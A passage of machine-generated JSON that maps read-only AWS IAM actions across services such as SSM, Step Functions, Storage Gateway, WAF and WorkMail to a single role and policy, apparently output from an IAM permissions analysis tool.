null}}}}}}}},"ssm:describePatchGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describePatchProperties": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:describeSessions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getAutomationExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getCommandInvocation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getConnectionStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getDefaultPatchBaseline": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getDeployablePatchSnapshotForInstance": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getInventorySchema": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getMaintenanceWindow": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getMaintenanceWindowExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getMaintenanceWindowExecutionTask": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getMaintenanceWindowExecutionTaskInvocation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getMaintenanceWindowTask": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getPatchBaseline": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getPatchBaselineForPatchGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:getServiceSetting": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:labelParameterVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listAssociationVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listAssociations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listCommandInvocations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listCommands": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listComplianceItems": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listComplianceSummaries": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listDocumentVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listDocuments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listResourceComplianceSummaries": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listResourceDataSync": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ssm:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:describeActivity": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:describeExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:describeStateMachine": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:describeStateMachineForExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:getExecutionHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:listActivities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:listExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"states:listStateMachines": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeBandwidthRateLimit": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeCache": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeCachediSCSIVolumes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeGatewayInformation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeMaintenanceStartTime": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeNFSFileShares": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeSMBFileShares": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeSMBSettings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeSnapshotSchedule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeStorediSCSIVolumes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeTapeArchives": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeTapeRecoveryPoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeTapes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeUploadBuffer": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeVTLDevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:describeWorkingStorage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listFileShares": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listLocalDisks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listTapes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listVolumeInitiators": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listVolumeRecoveryPoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"storagegateway:listVolumes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:countClosedWorkflowExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:countOpenWorkflowExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:countPendingActivityTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:countPendingDecisionTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:describeActivityType": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:describeDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:describeWorkflowExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:describeWorkflowType": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:getWorkflowExecutionHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:listActivityTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:listClosedWorkflowExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:listDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:listOpenWorkflowExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"swf:listWorkflowTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"transfer:describeServer": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"transfer:describeUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"transfer:listServers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"transfer:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"transfer:listUsers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:getByteMatchSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:getChangeTokenStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:getIPSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:getRule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:getSqlInjectionMatchSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:getWebACL": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:getWebACLForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:listByteMatchSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:listIPSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:listResourcesForWebACL": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:listRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:listSqlInjectionMatchSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf-regional:listWebACLs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getByteMatchSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getChangeTokenStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getIPSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getRule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getSampledRequests": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getSizeConstraintSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getSqlInjectionMatchSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getWebACL": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:getXssMatchSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:listByteMatchSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:listIPSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:listRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:listSizeConstraintSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:listSqlInjectionMatchSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:listWebACLs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"waf:listXssMatchSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:checkCapacity": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:describeManagedRuleGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getIPSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getLoggingConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getPermissionPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getRateBasedStatementManagedKeys": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getRegexPatternSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getRuleGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getSampledRequests": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getWebACL": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:getWebACLForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listAvailableManagedRuleGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listIPSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listLoggingConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listRegexPatternSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listResourcesForWebACL": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listRuleGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"wafv2:listWebACLs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workdocs:checkAlias": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workdocs:describeAvailableDirectories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workdocs:describeInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeAuditStreamConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeCompanyNetworkConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeDevice": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeDevicePolicyConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeFleetMetadata": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeIdentityProviderConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:describeWebsiteCertificateAuthority": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:listDevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:listDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:listFleets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:listWebsiteAuthorizationProviders": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"worklink:listWebsiteCertificateAuthorities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:describeGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:describeOrganization": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:describeResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:describeUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:listAliases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:listGroupMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:listGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"workmail:listMailboxPermissions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": 